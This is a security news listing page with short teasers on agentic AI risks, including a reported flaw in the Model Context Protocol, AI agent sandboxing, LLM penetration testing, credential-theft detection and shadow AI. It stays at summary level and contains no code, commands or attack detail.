Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

Agentic AI at risk after MCP design flaw discovery? #ai #cybersecurity #podcast

In this week's Intel Chat, Chris Luft and Matt Bromiley discuss a design flaw in Anthropic's Model Context Protocol (MCP) that could enable large-scale supply chain attacks on agentic AI systems. Researchers at OX Security found that MCP's command execution allows malicious commands to run silently without sanitization checks or warnings.

AI Agent Sandboxing in Financial Services: Containing Blast Radius

Your progressive enforcement rollout is working. eBPF sensors are deployed across the cluster. Behavioral baselines are converging. Enforcement policies are generating from observed behavior, just like the observe-to-enforce methodology prescribes. Then your compliance officer walks over to the platform team’s desks and asks a question nobody anticipated: “Which agents are in observation mode right now?”

Shift-Left Testing Only Works If Your Tests Are Trustworthy

Shift-left has become the standard answer to the quality and security problems that accumulate when testing happens late. Move testing earlier. Catch defects in development, not in production. Run security checks in the pipeline, not in a post-release audit. The principle is sound. The execution is where most teams run into trouble.

AI Penetration Testing: Protecting LLMs From Cyber Attacks

88% of organizations now regularly use artificial intelligence (AI) in at least one business function. While adoption of AI technologies has accelerated rapidly, security measures often lag. The rush to roll out AI has, in many cases, overshadowed essential testing and safety protocols. This is particularly a worry when AI and Large Language Models (LLMs) become deeply embedded within organizational workflows and systems in a way that most software isn’t.

Introducing Decipio: A Community Tool to Catch Credential Theft in the Act with Defense First AI

Today, Arctic Wolf is announcing Decipio, a new community‑shared cybersecurity tool designed to help defenders catch attackers while they’re trying to steal credentials inside a network. Credential theft is one of the most common ways cyber attacks begin and one of the hardest to detect early. In many cases, there’s no alert, no obvious warning, and no immediate sign that anything is wrong.

What we learned using AI agents to refactor a monolith

AI agents are increasingly used to refactor large codebases, but many teams lack a clear understanding of where they succeed and where they fail. At 1Password, we applied agentic tooling to a multi-million-line Go monolith, and in this blog we'll share what worked, what broke, and what it means for teams adopting AI in production systems.

AI Workload Security on GKE: Evaluating Google Cloud Native vs Third-Party Solutions

A CISO running AI agents on GKE has watched three Google product launches in eighteen months — Model Armor, expanded Security Command Center coverage for AI workloads, additions to Chronicle’s curated detection content — and is being asked whether the GCP-native stack is now sufficient. The vendor demos and the Google Cloud blog say yes. The 2 AM analyst experience says something different.

Frontier AI Is Collapsing the Exploit Window. Here's How Defenders Must Respond.

The defensive timeline in cybersecurity is changing faster than most organizations are prepared for. For years, defenders operated with an assumption that there would be some delay between vulnerability disclosure and exploitation. That delay created a window for patching, mitigation, and detection. It wasn’t perfect, but it gave security teams time to act. Frontier AI is removing that buffer and changing how organizations must consider cyber risk.

Why Identity Security is Key To Managing Shadow AI

Employees are adopting Artificial Intelligence (AI) tools to enhance their productivity, but they rarely consider the security implications of doing so. When an employee pastes sensitive customer data into an unapproved AI tool, that data is processed by a third-party model outside the organization’s control, often leaving no audit trail for security teams to review.